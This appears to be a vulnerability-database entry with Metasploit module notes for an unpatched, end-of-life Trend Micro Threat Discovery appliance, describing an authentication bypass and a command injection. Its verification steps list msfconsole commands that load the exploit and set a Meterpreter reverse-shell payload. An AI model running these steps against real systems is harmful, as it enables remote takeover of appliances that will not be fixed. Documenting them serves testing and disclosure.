Trend Micro Threat Discovery... CVE-2016-7552 CNNVD-201704-725

10.0 AV AC AU C I A
Published: 2017-04-12
Revised: 2017-04-17

A file delete vulnerability in the logoff.cgi interface allows for an authentication bypass (CVE-2016-7552). A command injection in the admin_sys_time.cgi interface allows an attacker to gain remote code execution (CVE-2016-7547). Trend Micro are not patching this vulnerability since this product is now [EOL](https://success.trendmicro.com/solution/1105727-list-of-end-of-life-eol-end-of-support-eos-trend-micro-products).

#### Installation

List the steps needed to make sure this thing works

* Download the ISO from Trend Micro's download site.
* Set up the VM to have 2 NICs, 100 Gig HD and 4096 RAM.
* Click through the default install.
* You are ready to burn.

#### Verification

List the steps needed to make sure this thing works

* Start `msfconsole`
* `use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi`
* `set payload linux/x86/meterpreter/reverse_tcp`
* `set RHOST XXX.XXX.XXX.XXX`
* `set LHOST XXX.XXX.XXX.XXX`
* `check`
* Verify that the target is vulnerable.
* `exploit`
* ...

There are currently 2 exploits/PoCs
There is currently 1 affected product entry